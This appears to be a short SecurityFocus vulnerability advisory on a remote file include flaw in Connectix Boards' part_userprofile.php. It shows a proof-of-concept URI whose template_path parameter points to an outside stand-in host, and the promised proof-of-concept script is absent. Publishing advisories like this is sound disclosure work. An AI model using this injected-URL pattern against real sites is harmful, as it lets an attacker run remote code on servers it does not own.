Connectix Boards 'part_userprofile.php' Remote File Include Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/templates/Official/part_userprofile.php?template_path=http://www.example2.com

The following proof-of-concept script code is also available:


 

Privacy Statement
Copyright 2010, SecurityFocus